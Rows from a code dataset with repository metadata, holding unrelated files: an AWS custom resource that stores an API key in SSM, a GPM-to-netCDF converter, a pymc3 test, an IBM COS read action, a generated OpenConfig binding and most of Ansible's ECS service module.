hexsha
stringlengths 40
40
| size
int64 3
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
972
| max_stars_repo_name
stringlengths 6
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
972
| max_issues_repo_name
stringlengths 6
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
116k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
972
| max_forks_repo_name
stringlengths 6
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 3
1.03M
| avg_line_length
float64 1.13
941k
| max_line_length
int64 2
941k
| alphanum_fraction
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
5025d421c224ba543b5beb63426e24bac5a64bd7
| 1,869
|
py
|
Python
|
source/samples/write-api-to-ssm-custom-resource/index.py
|
s3799570/P000075CSITCP
|
dcf9f388a22baffc99e01b445e5d95089a896113
|
[
"Apache-2.0"
] | 82
|
2018-07-24T18:37:07.000Z
|
2021-08-23T14:46:07.000Z
|
source/samples/write-api-to-ssm-custom-resource/index.py
|
s3799570/P000075CSITCP
|
dcf9f388a22baffc99e01b445e5d95089a896113
|
[
"Apache-2.0"
] | 17
|
2018-08-14T16:16:47.000Z
|
2021-08-31T21:19:21.000Z
|
source/samples/write-api-to-ssm-custom-resource/index.py
|
s3799570/P000075CSITCP
|
dcf9f388a22baffc99e01b445e5d95089a896113
|
[
"Apache-2.0"
] | 42
|
2018-07-25T19:21:18.000Z
|
2021-09-19T11:19:21.000Z
|
# -*- coding: utf-8 -*-
####################################################################################################################
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License Version 2.0 (the 'License'). You may not use this file except in compliance
# with the License. A copy of the License is located at
#
# http://www.apache.org/licenses/
#
# or in the 'license' file accompanying this file. This file is distributed on an 'AS IS' BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, express or implied. See the License for the specific language governing permissions
# and limitations under the License.
####################################################################################################################/
# @author Solution Builders
from crhelper import CfnResource
import boto3
helper = CfnResource()
ssm = boto3.client("ssm")
@helper.create
def create_ssm(event, _):
ssm_key_name = str(event["ResourceProperties"]["SSMKeyNameAPI"])
api_key = str(event["ResourceProperties"]["APIKey"])
ssm.put_parameter(Name=ssm_key_name, Value=api_key, Type="SecureString")
helper.Data.update({"APIKey": api_key})
helper.Data.update({"SSMKeyNameAPI": ssm_key_name})
@helper.update
def update_ssm(event, _):
ssm_key_name = str(event["ResourceProperties"]["SSMKeyNameAPI"])
api_key = str(event["ResourceProperties"]["APIKey"])
ssm.put_parameter(Name=ssm_key_name, Value=api_key, Type="SecureString", Overwrite=True)
helper.Data.update({"APIKey": api_key})
helper.Data.update({"SSMKeyNameAPI": ssm_key_name})
@helper.delete
def delete_ssm(event, _):
ssm_key_name = str(event["ResourceProperties"]["SSMKeyNameAPI"])
ssm.delete_parameter(Name=ssm_key_name)
def lambda_handler(event, context):
helper(event, context)
| 36.647059
| 117
| 0.642055
|
e217dd45a5e29769ca79a585602031ba927b909c
| 2,138
|
py
|
Python
|
dataset/GPM/gpm_transformer.py
|
prl900/unet_him8_gpm
|
5e27510b1c3eb76e57461316f25240231cbc3c37
|
[
"Apache-2.0"
] | null | null | null |
dataset/GPM/gpm_transformer.py
|
prl900/unet_him8_gpm
|
5e27510b1c3eb76e57461316f25240231cbc3c37
|
[
"Apache-2.0"
] | null | null | null |
dataset/GPM/gpm_transformer.py
|
prl900/unet_him8_gpm
|
5e27510b1c3eb76e57461316f25240231cbc3c37
|
[
"Apache-2.0"
] | 1
|
2020-06-20T01:15:05.000Z
|
2020-06-20T01:15:05.000Z
|
#!/g/data/v10/public/modules/dea-env/20181015/bin/python
import argparse
import datetime
import netCDF4
import h5py
import numpy as np
def pack(data, date, dst):
with netCDF4.Dataset(dst, 'w', format='NETCDF4_CLASSIC') as ds:
setattr(ds, "date_created", datetime.datetime.now().strftime("%Y%m%dT%H%M%S"))
ds.createDimension("time", 1)
ds.createDimension("latitude", data.shape[0])
ds.createDimension("longitude", data.shape[1])
var = ds.createVariable("time", "f8", ("time",))
var.units = "seconds since 1970-01-01 00:00:00.0"
var.calendar = "standard"
var.long_name = "Time, unix time-stamp"
var.standard_name = "time"
var[:] = netCDF4.date2num([date], units="seconds since 1970-01-01 00:00:00.0", calendar="standard")
var = ds.createVariable("longitude", "f8", ("longitude",))
var.units = "degrees_east"
var.long_name = "longitude"
var[:] = np.linspace(-179.95, 179.95, 3600)
var = ds.createVariable("latitude", "f8", ("latitude",))
var.units = "degrees_north"
var.long_name = "latitude"
var[:] = np.linspace(89.95, -89.95, 1800)
var = ds.createVariable("precipitationCal", "f4", ("time", "latitude", "longitude"), fill_value=-9999.9)
var.long_name = "Precipitation Calibrated"
var.units = 'mm/h'
var[:] = data[None,...]
def get_prec(f_path):
with h5py.File(f_path, mode='r') as f:
prec = f['Grid']['precipitationCal'][:].T[::-1, :]
prec[prec == -9999.9] = np.nan
return prec
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="""GPM HDF-EOS to netCDF4 converter""")
parser.add_argument('-src', '--source', required=True, type=str, help="Full path to source.")
parser.add_argument('-dst', '--destination', required=True, type=str, help="Full path to destination.")
args = parser.parse_args()
date = datetime.datetime.strptime(args.source[74:82]+args.source[84:88], '%Y%m%d%H%M')
print(date)
prec = get_prec(args.source)
pack(prec, date, args.destination)
| 36.862069
| 112
| 0.621141
|
d1949ef60ff597915efb5df1a788eb1adc9b8e1e
| 1,509
|
py
|
Python
|
pymc3_ext/tests/test_shared.py
|
wlad111/pymc3
|
43432834be5bbca72caa32d40a848515eea554a8
|
[
"Apache-2.0"
] | null | null | null |
pymc3_ext/tests/test_shared.py
|
wlad111/pymc3
|
43432834be5bbca72caa32d40a848515eea554a8
|
[
"Apache-2.0"
] | null | null | null |
pymc3_ext/tests/test_shared.py
|
wlad111/pymc3
|
43432834be5bbca72caa32d40a848515eea554a8
|
[
"Apache-2.0"
] | null | null | null |
import pymc3_ext as pm
from .helpers import SeededTest
import numpy as np
import theano
class TestShared(SeededTest):
def test_deterministic(self):
with pm.Model() as model:
data_values = np.array([.5, .4, 5, 2])
X = theano.shared(np.asarray(data_values, dtype=theano.config.floatX), borrow=True)
pm.Normal('y', 0, 1, observed=X)
model.logp(model.test_point)
def test_sample(self):
x = np.random.normal(size=100)
y = x + np.random.normal(scale=1e-2, size=100)
x_pred = np.linspace(-3, 3, 200)
x_shared = theano.shared(x)
with pm.Model() as model:
b = pm.Normal('b', 0., 10.)
pm.Normal('obs', b * x_shared, np.sqrt(1e-2), observed=y)
prior_trace0 = pm.sample_prior_predictive(1000)
trace = pm.sample(1000, init=None, progressbar=False)
pp_trace0 = pm.sample_posterior_predictive(trace, 1000)
x_shared.set_value(x_pred)
prior_trace1 = pm.sample_prior_predictive(1000)
pp_trace1 = pm.sample_posterior_predictive(trace, 1000)
assert prior_trace0['b'].shape == (1000,)
assert prior_trace0['obs'].shape == (1000, 100)
np.testing.assert_allclose(x, pp_trace0['obs'].mean(axis=0), atol=1e-1)
assert prior_trace1['b'].shape == (1000,)
assert prior_trace1['obs'].shape == (1000, 200)
np.testing.assert_allclose(x_pred, pp_trace1['obs'].mean(axis=0), atol=1e-1)
| 35.928571
| 95
| 0.614977
|
3c6db3faa39258948006b9b91d7cb92af860fc05
| 2,261
|
py
|
Python
|
runtimes/python/actions/object-read.py
|
jasonpet/package-cloud-object-storage
|
e4d1b4a35c0ea8602abff4618c5349ecaea631c2
|
[
"Apache-2.0"
] | 2
|
2018-04-14T15:54:55.000Z
|
2018-05-03T20:57:00.000Z
|
runtimes/python/actions/object-read.py
|
jasonpet/package-cloud-object-storage
|
e4d1b4a35c0ea8602abff4618c5349ecaea631c2
|
[
"Apache-2.0"
] | 24
|
2018-04-18T19:32:56.000Z
|
2019-09-05T13:49:35.000Z
|
runtimes/python/actions/object-read.py
|
jasonpet/package-cloud-object-storage
|
e4d1b4a35c0ea8602abff4618c5349ecaea631c2
|
[
"Apache-2.0"
] | 8
|
2018-04-04T16:30:09.000Z
|
2019-11-18T09:44:50.000Z
|
# This action will read from Cloud Object Storage. If the Cloud Object Storage
# service is not bound to this action or to the package containing this action,
# then you must provide the service information as argument input to this function.
# Cloud Functions actions accept a single parameter, which must be a JSON object.
#
# In this case, the args variable will look like:
# {
# "bucket": "your COS bucket name",
# "key": "Name of the object to read"
# }
import sys
import json
import os
import ibm_boto3
from ibm_botocore.client import Config, ClientError
def main(args):
resultsGetParams = getParamsCOS(args)
cos = resultsGetParams.get('cos')
params = resultsGetParams.get('params')
bucket = params.get('bucket')
key = params.get('key')
try:
if not bucket or not key or not cos:
raise ValueError("bucket name, key, and apikey are required for this operation.")
except ValueError as e:
print(e)
raise
try:
object = cos.get_object(
Bucket=bucket,
Key=key,
)
except ClientError as e:
print(e)
raise e
return {
'bucket':bucket,
'key':key,
'body': str(object['Body'].read())
}
def getParamsCOS(args):
endpoint = args.get('endpoint','https://s3.us.cloud-object-storage.appdomain.cloud')
if not (endpoint.startswith("https://") or endpoint.startswith("http://")) : endpoint = "https://" + endpoint
api_key_id = args.get('apikey', args.get('apiKeyId', args.get('__bx_creds', {}).get('cloud-object-storage', {}).get('apikey', os.environ.get('__OW_IAM_NAMESPACE_API_KEY') or '')))
service_instance_id = args.get('resource_instance_id', args.get('serviceInstanceId', args.get('__bx_creds', {}).get('cloud-object-storage', {}).get('resource_instance_id', '')))
ibm_auth_endpoint = args.get('ibmAuthEndpoint', 'https://iam.cloud.ibm.com/identity/token')
params = {}
params['bucket'] = args.get('bucket')
params['key'] = args.get('key')
if not api_key_id:
return {'cos': None, 'params':params}
cos = ibm_boto3.client('s3',
ibm_api_key_id=api_key_id,
ibm_service_instance_id=service_instance_id,
ibm_auth_endpoint=ibm_auth_endpoint,
config=Config(signature_version='oauth'),
endpoint_url=endpoint)
return {'cos':cos, 'params':params}
| 33.746269
| 182
| 0.697479
|
f40f577f0bba8f847bb76a90a1206419dab859ad
| 6,947
|
py
|
Python
|
napalm_yang/models/openconfig/system/logging/remote_servers/remote_server/selectors/__init__.py
|
ckishimo/napalm-yang
|
8f2bd907bd3afcde3c2f8e985192de74748baf6c
|
[
"Apache-2.0"
] | 64
|
2016-10-20T15:47:18.000Z
|
2021-11-11T11:57:32.000Z
|
napalm_yang/models/openconfig/system/logging/remote_servers/remote_server/selectors/__init__.py
|
ckishimo/napalm-yang
|
8f2bd907bd3afcde3c2f8e985192de74748baf6c
|
[
"Apache-2.0"
] | 126
|
2016-10-05T10:36:14.000Z
|
2019-05-15T08:43:23.000Z
|
napalm_yang/models/openconfig/system/logging/remote_servers/remote_server/selectors/__init__.py
|
ckishimo/napalm-yang
|
8f2bd907bd3afcde3c2f8e985192de74748baf6c
|
[
"Apache-2.0"
] | 63
|
2016-11-07T15:23:08.000Z
|
2021-09-22T14:41:16.000Z
|
# -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improved)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
from . import selector
class selectors(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-system - based on the path /system/logging/remote-servers/remote-server/selectors. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Enclosing container
"""
__slots__ = ("_path_helper", "_extmethods", "__selector")
_yang_name = "selectors"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__selector = YANGDynClass(
base=YANGListType(
"facility severity",
selector.selector,
yang_name="selector",
parent=self,
is_container="list",
user_ordered=False,
path_helper=self._path_helper,
yang_keys="facility severity",
extensions=None,
),
is_container="list",
yang_name="selector",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/system",
defining_module="openconfig-system",
yang_type="list",
is_config=True,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return ["system", "logging", "remote-servers", "remote-server", "selectors"]
def _get_selector(self):
"""
Getter method for selector, mapped from YANG variable /system/logging/remote_servers/remote_server/selectors/selector (list)
YANG Description: List of selectors for log messages
"""
return self.__selector
def _set_selector(self, v, load=False):
"""
Setter method for selector, mapped from YANG variable /system/logging/remote_servers/remote_server/selectors/selector (list)
If this variable is read-only (config: false) in the
source YANG file, then _set_selector is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_selector() directly.
YANG Description: List of selectors for log messages
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=YANGListType(
"facility severity",
selector.selector,
yang_name="selector",
parent=self,
is_container="list",
user_ordered=False,
path_helper=self._path_helper,
yang_keys="facility severity",
extensions=None,
),
is_container="list",
yang_name="selector",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/system",
defining_module="openconfig-system",
yang_type="list",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """selector must be of a type compatible with list""",
"defined-type": "list",
"generated-type": """YANGDynClass(base=YANGListType("facility severity",selector.selector, yang_name="selector", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='facility severity', extensions=None), is_container='list', yang_name="selector", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/system', defining_module='openconfig-system', yang_type='list', is_config=True)""",
}
)
self.__selector = t
if hasattr(self, "_set"):
self._set()
def _unset_selector(self):
self.__selector = YANGDynClass(
base=YANGListType(
"facility severity",
selector.selector,
yang_name="selector",
parent=self,
is_container="list",
user_ordered=False,
path_helper=self._path_helper,
yang_keys="facility severity",
extensions=None,
),
is_container="list",
yang_name="selector",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/system",
defining_module="openconfig-system",
yang_type="list",
is_config=True,
)
selector = __builtin__.property(_get_selector, _set_selector)
_pyangbind_elements = OrderedDict([("selector", selector)])
| 37.149733
| 542
| 0.590903
|
27581a7e599116a761cfabffb9dcc75b5bf52a66
| 25,229
|
py
|
Python
|
ansible/my_env/lib/python2.7/site-packages/ansible/modules/cloud/amazon/ecs_service.py
|
otus-devops-2019-02/yyashkin_infra
|
0cd0c003884155ac922e3e301305ac202de7028c
|
[
"MIT"
] | 1
|
2019-04-16T21:23:15.000Z
|
2019-04-16T21:23:15.000Z
|
ansible/my_env/lib/python2.7/site-packages/ansible/modules/cloud/amazon/ecs_service.py
|
otus-devops-2019-02/yyashkin_infra
|
0cd0c003884155ac922e3e301305ac202de7028c
|
[
"MIT"
] | 5
|
2020-02-26T20:10:50.000Z
|
2021-09-23T23:23:18.000Z
|
ansible/my_env/lib/python2.7/site-packages/ansible/modules/cloud/amazon/ecs_service.py
|
otus-devops-2019-02/yyashkin_infra
|
0cd0c003884155ac922e3e301305ac202de7028c
|
[
"MIT"
] | 1
|
2020-02-13T14:24:57.000Z
|
2020-02-13T14:24:57.000Z
|
#!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ecs_service
short_description: create, terminate, start or stop a service in ecs
description:
- Creates or terminates ecs services.
notes:
- the service role specified must be assumable (i.e. have a trust relationship for the ecs service, ecs.amazonaws.com)
- for details of the parameters and returns see U(https://boto3.readthedocs.io/en/latest/reference/services/ecs.html)
- An IAM role must have been previously created
version_added: "2.1"
author:
- "Mark Chance (@java1guy)"
- "Darek Kaczynski (@kaczynskid)"
- "Stephane Maarek (@simplesteph)"
- "Zac Blazic (@zacblazic)"
requirements: [ json, botocore, boto3 ]
options:
state:
description:
- The desired state of the service
required: true
choices: ["present", "absent", "deleting"]
name:
description:
- The name of the service
required: true
cluster:
description:
- The name of the cluster in which the service exists
required: false
task_definition:
description:
- The task definition the service will run. This parameter is required when state=present
required: false
load_balancers:
description:
- The list of ELBs defined for this service
required: false
desired_count:
description:
- The count of how many instances of the service. This parameter is required when state=present
required: false
client_token:
description:
- Unique, case-sensitive identifier you provide to ensure the idempotency of the request. Up to 32 ASCII characters are allowed.
required: false
role:
description:
- The name or full Amazon Resource Name (ARN) of the IAM role that allows your Amazon ECS container agent to make calls to your load balancer
on your behalf. This parameter is only required if you are using a load balancer with your service, in a network mode other than `awsvpc`.
required: false
delay:
description:
- The time to wait before checking that the service is available
required: false
default: 10
repeat:
description:
- The number of times to check that the service is available
required: false
default: 10
deployment_configuration:
description:
- Optional parameters that control the deployment_configuration; format is '{"maximum_percent":<integer>, "minimum_healthy_percent":<integer>}
required: false
version_added: 2.3
placement_constraints:
description:
- The placement constraints for the tasks in the service
required: false
version_added: 2.4
placement_strategy:
description:
- The placement strategy objects to use for tasks in your service. You can specify a maximum of 5 strategy rules per service
required: false
version_added: 2.4
network_configuration:
description:
- network configuration of the service. Only applicable for task definitions created with C(awsvpc) I(network_mode).
- assign_public_ip requires botocore >= 1.8.4
suboptions:
subnets:
description:
- A list of subnet IDs to associate with the task
version_added: 2.6
security_groups:
description:
- A list of security group names or group IDs to associate with the task
version_added: 2.6
assign_public_ip:
description:
- Whether the task's elastic network interface receives a public IP address. This option requires botocore >= 1.8.4.
type: bool
version_added: 2.7
launch_type:
description:
- The launch type on which to run your service
required: false
version_added: 2.7
choices: ["EC2", "FARGATE"]
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
# Note: These examples do not set authentication details, see the AWS Guide for details.
- ecs_service:
state: present
name: console-test-service
cluster: new_cluster
task_definition: 'new_cluster-task:1'
desired_count: 0
# Basic provisioning example
- ecs_service:
name: default
state: present
cluster: new_cluster
- name: create ECS service on VPC network
ecs_service:
state: present
name: console-test-service
cluster: new_cluster
task_definition: 'new_cluster-task:1'
desired_count: 0
network_configuration:
subnets:
- subnet-abcd1234
security_groups:
- sg-aaaa1111
- my_security_group
# Simple example to delete
- ecs_service:
name: default
state: absent
cluster: new_cluster
# With custom deployment configuration (added in version 2.3), placement constraints and strategy (added in version 2.4)
- ecs_service:
state: present
name: test-service
cluster: test-cluster
task_definition: test-task-definition
desired_count: 3
deployment_configuration:
minimum_healthy_percent: 75
maximum_percent: 150
placement_constraints:
- type: memberOf
expression: 'attribute:flavor==test'
placement_strategy:
- type: binpack
field: memory
'''
RETURN = '''
service:
description: Details of created service.
returned: when creating a service
type: complex
contains:
clusterArn:
description: The Amazon Resource Name (ARN) of the of the cluster that hosts the service.
returned: always
type: string
desiredCount:
description: The desired number of instantiations of the task definition to keep running on the service.
returned: always
type: int
loadBalancers:
description: A list of load balancer objects
returned: always
type: complex
contains:
loadBalancerName:
description: the name
returned: always
type: string
containerName:
description: The name of the container to associate with the load balancer.
returned: always
type: string
containerPort:
description: The port on the container to associate with the load balancer.
returned: always
type: int
pendingCount:
description: The number of tasks in the cluster that are in the PENDING state.
returned: always
type: int
runningCount:
description: The number of tasks in the cluster that are in the RUNNING state.
returned: always
type: int
serviceArn:
description: The Amazon Resource Name (ARN) that identifies the service. The ARN contains the arn:aws:ecs namespace, followed by the region
of the service, the AWS account ID of the service owner, the service namespace, and then the service name. For example,
arn:aws:ecs:region :012345678910 :service/my-service .
returned: always
type: string
serviceName:
description: A user-generated string used to identify the service
returned: always
type: string
status:
description: The valid values are ACTIVE, DRAINING, or INACTIVE.
returned: always
type: string
taskDefinition:
description: The ARN of a task definition to use for tasks in the service.
returned: always
type: string
deployments:
description: list of service deployments
returned: always
type: list of complex
deploymentConfiguration:
description: dictionary of deploymentConfiguration
returned: always
type: complex
contains:
maximumPercent:
description: maximumPercent param
returned: always
type: int
minimumHealthyPercent:
description: minimumHealthyPercent param
returned: always
type: int
events:
description: list of service events
returned: always
type: list of complex
placementConstraints:
description: List of placement constraints objects
returned: always
type: list of complex
contains:
type:
description: The type of constraint. Valid values are distinctInstance and memberOf.
returned: always
type: string
expression:
description: A cluster query language expression to apply to the constraint. Note you cannot specify an expression if the constraint type is
distinctInstance.
returned: always
type: string
placementStrategy:
description: List of placement strategy objects
returned: always
type: list of complex
contains:
type:
description: The type of placement strategy. Valid values are random, spread and binpack.
returned: always
type: string
field:
description: The field to apply the placement strategy against. For the spread placement strategy, valid values are instanceId
(or host, which has the same effect), or any platform or custom attribute that is applied to a container instance,
such as attribute:ecs.availability-zone. For the binpack placement strategy, valid values are CPU and MEMORY.
returned: always
type: string
ansible_facts:
description: Facts about deleted service.
returned: when deleting a service
type: complex
contains:
service:
description: Details of deleted service in the same structure described above for service creation.
returned: when service existed and was deleted
type: complex
'''
import time
DEPLOYMENT_CONFIGURATION_TYPE_MAP = {
'maximum_percent': 'int',
'minimum_healthy_percent': 'int'
}
from ansible.module_utils.aws.core import AnsibleAWSModule
from ansible.module_utils.ec2 import ec2_argument_spec
from ansible.module_utils.ec2 import snake_dict_to_camel_dict, map_complex_type, get_ec2_security_group_ids_from_names
try:
import botocore
except ImportError:
pass # handled by AnsibleAWSModule
class EcsServiceManager:
"""Handles ECS Services"""
def __init__(self, module):
self.module = module
self.ecs = module.client('ecs')
self.ec2 = module.client('ec2')
def format_network_configuration(self, network_config):
result = dict()
if network_config['subnets'] is not None:
result['subnets'] = network_config['subnets']
else:
self.module.fail_json(msg="Network configuration must include subnets")
if network_config['security_groups'] is not None:
groups = network_config['security_groups']
if any(not sg.startswith('sg-') for sg in groups):
try:
vpc_id = self.ec2.describe_subnets(SubnetIds=[result['subnets'][0]])['Subnets'][0]['VpcId']
groups = get_ec2_security_group_ids_from_names(groups, self.ec2, vpc_id)
except (botocore.exceptions.ClientError, botocore.exceptions.BotoCoreError) as e:
self.module.fail_json_aws(e, msg="Couldn't look up security groups")
result['securityGroups'] = groups
if network_config['assign_public_ip'] is not None:
if self.module.botocore_at_least('1.8.4'):
if network_config['assign_public_ip'] is True:
result['assignPublicIp'] = "ENABLED"
else:
result['assignPublicIp'] = "DISABLED"
else:
self.module.fail_json(msg='botocore needs to be version 1.8.4 or higher to use assign_public_ip in network_configuration')
return dict(awsvpcConfiguration=result)
def find_in_array(self, array_of_services, service_name, field_name='serviceArn'):
for c in array_of_services:
if c[field_name].endswith(service_name):
return c
return None
def describe_service(self, cluster_name, service_name):
response = self.ecs.describe_services(
cluster=cluster_name,
services=[service_name])
msg = ''
if len(response['failures']) > 0:
c = self.find_in_array(response['failures'], service_name, 'arn')
msg += ", failure reason is " + c['reason']
if c and c['reason'] == 'MISSING':
return None
# fall thru and look through found ones
if len(response['services']) > 0:
c = self.find_in_array(response['services'], service_name)
if c:
return c
raise Exception("Unknown problem describing service %s." % service_name)
def is_matching_service(self, expected, existing):
if expected['task_definition'] != existing['taskDefinition']:
return False
if (expected['load_balancers'] or []) != existing['loadBalancers']:
return False
if (expected['desired_count'] or 0) != existing['desiredCount']:
return False
return True
def create_service(self, service_name, cluster_name, task_definition, load_balancers,
desired_count, client_token, role, deployment_configuration,
placement_constraints, placement_strategy, network_configuration,
launch_type):
params = dict(
cluster=cluster_name,
serviceName=service_name,
taskDefinition=task_definition,
loadBalancers=load_balancers,
desiredCount=desired_count,
clientToken=client_token,
role=role,
deploymentConfiguration=deployment_configuration,
placementConstraints=placement_constraints,
placementStrategy=placement_strategy
)
if network_configuration:
params['networkConfiguration'] = network_configuration
if launch_type:
params['launchType'] = launch_type
response = self.ecs.create_service(**params)
return self.jsonize(response['service'])
def update_service(self, service_name, cluster_name, task_definition,
desired_count, deployment_configuration, network_configuration):
params = dict(
cluster=cluster_name,
service=service_name,
taskDefinition=task_definition,
desiredCount=desired_count,
deploymentConfiguration=deployment_configuration)
if network_configuration:
params['networkConfiguration'] = network_configuration
response = self.ecs.update_service(**params)
return self.jsonize(response['service'])
def jsonize(self, service):
# some fields are datetime which is not JSON serializable
# make them strings
if 'createdAt' in service:
service['createdAt'] = str(service['createdAt'])
if 'deployments' in service:
for d in service['deployments']:
if 'createdAt' in d:
d['createdAt'] = str(d['createdAt'])
if 'updatedAt' in d:
d['updatedAt'] = str(d['updatedAt'])
if 'events' in service:
for e in service['events']:
if 'createdAt' in e:
e['createdAt'] = str(e['createdAt'])
return service
def delete_service(self, service, cluster=None):
return self.ecs.delete_service(cluster=cluster, service=service)
def ecs_api_handles_network_configuration(self):
from distutils.version import LooseVersion
# There doesn't seem to be a nice way to inspect botocore to look
# for attributes (and networkConfiguration is not an explicit argument
# to e.g. ecs.run_task, it's just passed as a keyword argument)
return LooseVersion(botocore.__version__) >= LooseVersion('1.7.44')
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
state=dict(required=True, choices=['present', 'absent', 'deleting']),
name=dict(required=True, type='str'),
cluster=dict(required=False, type='str'),
task_definition=dict(required=False, type='str'),
load_balancers=dict(required=False, default=[], type='list'),
desired_count=dict(required=False, type='int'),
client_token=dict(required=False, default='', type='str'),
role=dict(required=False, default='', type='str'),
delay=dict(required=False, type='int', default=10),
repeat=dict(required=False, type='int', default=10),
deployment_configuration=dict(required=False, default={}, type='dict'),
placement_constraints=dict(required=False, default=[], type='list'),
placement_strategy=dict(required=False, default=[], type='list'),
network_configuration=dict(required=False, type='dict', options=dict(
subnets=dict(type='list'),
security_groups=dict(type='list'),
assign_public_ip=dict(type='bool'),
)),
launch_type=dict(required=False, choices=['EC2', 'FARGATE'])
))
module = AnsibleAWSModule(argument_spec=argument_spec,
supports_check_mode=True,
required_if=[('state', 'present', ['task_definition', 'desired_count']),
('launch_type', 'FARGATE', ['network_configuration'])],
required_together=[['load_balancers', 'role']])
service_mgr = EcsServiceManager(module)
if module.params['network_configuration']:
if not service_mgr.ecs_api_handles_network_configuration():
module.fail_json(msg='botocore needs to be version 1.7.44 or higher to use network configuration')
network_configuration = service_mgr.format_network_configuration(module.params['network_configuration'])
else:
network_configuration = None
deployment_configuration = map_complex_type(module.params['deployment_configuration'],
DEPLOYMENT_CONFIGURATION_TYPE_MAP)
deploymentConfiguration = snake_dict_to_camel_dict(deployment_configuration)
try:
existing = service_mgr.describe_service(module.params['cluster'], module.params['name'])
except Exception as e:
module.fail_json(msg="Exception describing service '" + module.params['name'] + "' in cluster '" + module.params['cluster'] + "': " + str(e))
results = dict(changed=False)
if module.params['launch_type']:
if not module.botocore_at_least('1.8.4'):
module.fail_json(msg='botocore needs to be version 1.8.4 or higher to use launch_type')
if module.params['state'] == 'present':
matching = False
update = False
if existing and 'status' in existing and existing['status'] == "ACTIVE":
if service_mgr.is_matching_service(module.params, existing):
matching = True
results['service'] = existing
else:
update = True
if not matching:
if not module.check_mode:
role = module.params['role']
clientToken = module.params['client_token']
loadBalancers = module.params['load_balancers']
if update:
if (existing['loadBalancers'] or []) != loadBalancers:
module.fail_json(msg="It is not possible to update the load balancers of an existing service")
# update required
response = service_mgr.update_service(module.params['name'],
module.params['cluster'],
module.params['task_definition'],
module.params['desired_count'],
deploymentConfiguration,
network_configuration)
else:
for loadBalancer in loadBalancers:
if 'containerPort' in loadBalancer:
loadBalancer['containerPort'] = int(loadBalancer['containerPort'])
# doesn't exist. create it.
try:
response = service_mgr.create_service(module.params['name'],
module.params['cluster'],
module.params['task_definition'],
loadBalancers,
module.params['desired_count'],
clientToken,
role,
deploymentConfiguration,
module.params['placement_constraints'],
module.params['placement_strategy'],
network_configuration,
module.params['launch_type'])
except botocore.exceptions.ClientError as e:
module.fail_json_aws(e, msg="Couldn't create service")
results['service'] = response
results['changed'] = True
elif module.params['state'] == 'absent':
if not existing:
pass
else:
# it exists, so we should delete it and mark changed.
# return info about the cluster deleted
del existing['deployments']
del existing['events']
